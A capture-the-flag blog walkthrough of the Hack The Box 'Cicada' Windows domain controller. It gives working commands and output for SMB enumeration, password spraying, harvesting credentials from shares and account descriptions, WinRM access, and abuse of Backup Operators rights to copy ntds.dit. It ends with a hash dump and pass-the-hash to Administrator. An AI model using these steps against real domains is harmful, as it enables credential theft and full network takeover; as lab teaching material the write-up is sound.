Hack The Box Intro to Red Team Track

Hack The Box: Cicada Walkthrough

Author
Dulanjana Fernando
Sep 30, 2026  •  10 min read  •  9 views
Hack The Box: Cicada Walkthrough

Cicada is an easy-difficulty HackTheBox machine that hosts a Windows Active Directory Domain Controller where initial access begins with unauthenticated SMB share enumeration to retrieve a corporate notice containing a default password. Performing RID brute-forcing identifies domain user accounts, and password spraying yields access as michael.wrightson. Querying Active Directory user attributes reveals plaintext credentials for david.orelious stored inside an account description. Authenticating as david.orelious provides read access to a development SMB share containing a PowerShell backup script, which discloses hardcoded WinRM credentials for emily.oscars. With an interactive WinRM session established as emily.oscars, inspecting user privileges confirms SeBackupPrivilege rights and membership in BUILTIN\Backup Operators. Full domain compromise is achieved by leveraging diskshadow to create a Volume Shadow Copy, extracting ntds.dit and the SYSTEM registry hive to decrypt the Domain Administrator NTLM hash offline, and authenticating via Pass-the-Hash.

1. Reconnaissance & Anonymous SMB Enumeration

1.1 Network Scanning & Port Service Discovery

As the first step, I ran an NMAP scan on the target machine to get a better idea of the target machine. I used nmap -sC -sV -O cicada.htb -oN nmap_scan to scan the open ports and services.

nmap -sC -sV -O cicada.htb -oN nmap_scan
Starting Nmap 7.99 ( https://nmap.org ) at 2026-09-29 02:05 -0400
Nmap scan report for cicada.htb (10.129.231.149)
Host is up (0.50s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-09-28 13:10:09Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-09-28T13:11:52+00:00; -16h55m56s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:

Based on the results, the target machine is an Active Directory Domain Controller(CICADA-DC.cicada.htb).

The target machine exposes multiple services across multiple open ports.

  • Port 53 - Running Simple DNS Plus.
  • Ports 88 and 465 - Active Directory Kerberos authentication and password services.
  • Ports 135 and 593 - RPC over HTTP
  • Ports 389, 636, 3268 and 3269 - Active Directory LDAP Service
  • Port 5985 - Microsoft HTTPAPI Service

1.2 Anonymous SMB Share Enumeration

Since the SMB service is exposed, I decided to enumerate it first. I was able to list some of the SMB shares anonymously without a password.

smbclient -L cicada.htb -N
Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        DEV             Disk      
        HR              Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to cicada.htb failed (Error NT_S

The result revealed two non-standard shares: DEV and HR

1.3 HR Share Exfiltration & Default Password Recovery

I was able to connect to the HR share anonymously and list the contents. The List contained a file Notice from HR.txt.

smbclient //cicada.htb/HR -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 08:29:09 2024
  ..                                  D        0  Thu Mar 14 08:21:29 2024
  Notice from HR.txt                  A     1266  Wed Aug 28 13:31:48 2024

                4168447 blocks of size 4096. 476376 blocks available
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)

By downloading and inspecting the file, I was able to discover the welcome instructions intended for new hires. These instructions contained the default password for the new employee accounts.


Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8
...

2. Credential Harvesting & Active Directory Discovery

2.1 RID Brute-Forcing & Domain User Enumeration

Since null authentication is permitted, next, I used netexec to enumerate RIDs from the target machine.

netexec smb cicada.htb -u guest -p '' --rid-brute
SMB         10.129.231.149  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb)
SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\guest: 
...
SMB         10.129.231.149  445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)

The result provided a list of usernames and group names on the target machine. Now I have a list of user accounts that I can try against the default password I found in the welcome message in the HR share.

2.2 Default Password Spraying

After extracting the usernames and creating the user.txt file, I used netexec again to spray the default password across all usernames.

netexec smb cicada.htb -u user.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
SMB         10.129.231.149  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.231.149  445    CICADA-DC        [-] CICADA\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.231.149  445    CICADA-DC        [-] CICADA\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.231.149  445    CICADA-DC        [+] CICADA\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
SMB         10.129.231.149  445    CICADA-DC        [-] CICADA\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.231.149  445    CICADA-DC        [-] CICADA\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE

The password worked for user michael.wrightson.

2.3 Domain User Description Enumeration

Even though michael.wrightson accepts the default password for SMB authentication, RDP is restricted, and the shell drops immediately.
Since I was unable to gain a foothold using michael.wrightson, I decided to enumerate SMB further using michael.wrightson credentials because authenticated results might reveal more information.

netexec smb cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
SMB         10.129.231.149  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
SMB         10.129.231.149  445    CICADA-DC        -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         10.129.231.149  445    CICADA-DC        Administrator                 2024-08-26 20:08:03 0       Built-in account for administering the computer/domain 
SMB         10.129.231.149  445    CICADA-DC        Guest                         2024-08-28 17:26:56 0       Built-in account for guest access to the computer/domain 
SMB         10.129.231.149  445    CICADA-DC        krbtgt                        2024-03-14 11:14:10 0       Key Distribution Center Service Account 
...       
SMB         10.129.231.149  445    CICADA-DC        david.orelious                2024-03-14 12:17:29 2       Just in case I forget my password is aRt$Lp#7t*VQ!3 
SMB         10.129.231.149  445    CICADA-DC        emily.oscars                  2024-08-22 21:20:17 2        
SMB         10.129.231.149  445    CICADA-DC        [*] Enumerated 8 local users: CICADA

The scan result reveals the password for user david.orelious.

3. Lateral Movement & Initial Access

3.1 DEV Share Enumeration & Credential Harvesting

Similar to michael.wrightson credentials, I couldn't gain a foothold on the machine using david.orelious credentials.

SMB share permission inspection revealed that david.orelious has read access to the DEV share.

netexec smb cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
SMB         10.129.231.149  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 
SMB         10.129.231.149  445    CICADA-DC        [*] Enumerated shares
SMB         10.129.231.149  445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.231.149  445    CICADA-DC        -----           -----------     ------
SMB         10.129.231.149  445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.231.149  445    CICADA-DC        C$                              Default share
SMB         10.129.231.149  445    CICADA-DC        DEV             READ            
SMB         10.129.231.149  445    CICADA-DC        HR              READ            
SMB         10.129.231.149  445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.231.149  445    CICADA-DC        NETLOGON        READ            Logon server share 
SMB         10.129.231.149  445    CICADA-DC        SYSVOL          READ            Logon server share 

After logging into the SMB share, I was able to find Backup_script.ps1, which contains the hardcoded password for the user emily.oscars.

cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

3.2 WinRM Access & Initial Foothold

I was able to use emily.oscars credentials and log in to the target machine using evil-winrm and gain initial foothold and the user flag.

evil-winrm -i cicada.htb -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
...                                  
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> dir
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> dir


    Directory: C:\Users\emily.oscars.CICADA\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         9/28/2026   6:04 AM             34 user.txt


*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type user.txt

4. Privilege Escalation via Volume Shadow Copy & NTDS Dumping

4.1 User Privilege Identification

After establishing the initial foothold, I decided to enumerate for emily.oscars user and group permissions to find a way to escalate privileges. Running whoami /all revealed the privileges and group memberships.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami /all
USER INFORMATION
----------------

User Name           SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

Based on the output, emily.oscars is a member of the BUILTIN\Backup Operators group, and SeBackupPrivilege and SeRestorePrivilege privileges are enabled. These privileges allow bypassing standard file access control lists (ACLs) to perform file backups and restores.

This means even though emily.oscars is not an administrator, Windows trusts emily.oscars to perform backups and restores.

4.2 Volume Shadow Copy Creation

Because this machine is a Domain Controller, the C:\Windows\NTDS\ntds.dit file has the Active Directory database that contains user, NTML password hashes, domain information, etc.
But since emily.oscars is not an administrator, emily.oscars does not have permission to access the file using normal access controls. But as a backup operator, emily.oscars has to be able to back up the file without any restrictions.

Furthermore, since the C:\Windows\NTDS\ntds.dit file is locked by the Active Directory service processes during normal operations, a Shadow Copy needs to be created to capture a point-in-time snapshot of the complete C: drive.

After creating a staging directory C:\Temp, I created an instruction file inside the directory.


mkdir C:\Temp

$content = "set context persistent`r`nadd volume c: alias cicada`r`ncreate`r`nexpose %cicada% z:`r`n"
 
[System.IO.File]::WriteAllText(
    "C:\Temp\shadow.txt",
    $content,
    [System.Text.Encoding]::ASCII
)

The instructions file contains instructions for diskshadow.exe. It instructs diskshadow.exe to create a persistent snapshot of the C: drive and to expose it as a new drive Z:.

*Evil-WinRM* PS C:\Temp> diskshadow.exe /s C:\Temp\shadow.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  CICADA-DC,  9/28/2026 12:53:00 PM

-> set context persistent
-> add volume c: alias cicada
-> create
Alias cicada for shadow ID {74566dea-1c03-4018-a220-fb6a1fafd1b4} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {906a7979-4436-41af-8db0-a3438f8313f9} set as environment variable.

Querying all shadow copies with the shadow copy set ID {906a7979-4436-41af-8db0-a3438f8313f9}

        * Shadow copy ID = {74566dea-1c03-4018-a220-fb6a1fafd1b4}               %cicada%
                - Shadow copy set: {906a7979-4436-41af-8db0-a3438f8313f9}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{fcebaf9b-0000-0000-0000-500600000000}\ [C:\]
                - Creation time: 9/28/2026 12:53:26 PM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
                - Originating machine: CICADA-DC.cicada.htb
                - Service machine: CICADA-DC.cicada.htb
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent Differential

Number of shadow copies listed: 1
-> expose %cicada% z:
-> %cicada% = {74566dea-1c03-4018-a220-fb6a1fafd1b4}
The shadow copy was successfully exposed as z:\.
->
*Evil-WinRM* PS C:\Temp> 

4.3 Exfiltrating NTDS.dit and the SYSTEM Registry Hive

Once the Z: drive was exposed, I was able to copy the Z:\Windows\NTDS\ntds.dit file into my C:\Temp directory using robocopy backup mode to bypass ordinary file bypass checks.


robocopy /B Z:\Windows\NTDS C:\Temp ntds.dit

Getting the ntds.dit file alone is not enough because password hashes are encrypted using the keys derived from the system registry. I was able to copy the registry hive into C:\Temp too.


reg save HKLM\SYSTEM C:\Temp\SYSTEM

After both files were copied into my C:\Temp directory, I was able to download both files into my Kali machine to extract the password hashes using impacket-secretsdump locally.

4.4 Hash Extraction & Pass-the-Hash Domain Compromise

After both files were downloaded successfully, I was able to use impacket-secretsdump to decrypt and extract NTLM hashes.

impacket-secretsdump -system SYSTEM -ntds ntds.dit LOCAL
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: f954f575c626d6afe06c2b80cc2185e6
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
...

The dump contains the decrypted NTLM hash for Administrator. I was able to use this hash and log in as Administrator to the target machine using evil-winrm.

evil-winrm -i cicada.htb -u Administrator -H '2b87e7c93a3e8a0ea4a581937016f341'
Evil-WinRM shell v3.9
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt

Congrats! We found both flags!

HTB Machine Completion

Tags:
Intro to Red Team Track Windows SMB Enumeration

You might also like...

Hack The Box: Layover Walkthrough
Hack The Box Special Season: Aero
Hack The Box: Layover Walkthrough

Layover is a Medium difficulty HackTheBox machine that is part of Season 12....

Read More
Hack The Box: BoardLight Walkthrough
Hack The Box Intro to Red Team Track
Hack The Box: BoardLight Walkthrough

BoardLight is an Easy difficulty HackTheBox machine that exposes a CRM applicati...

Read More
Hack The Box: Precious Walkthrough
Hack The Box Intro to Red Team Track
Hack The Box: Precious Walkthrough

Precious is an Easy difficulty HackTheBox machine that features a web service de...

Read More

Stay Updated

Get notified when new walkthroughs and security articles are published.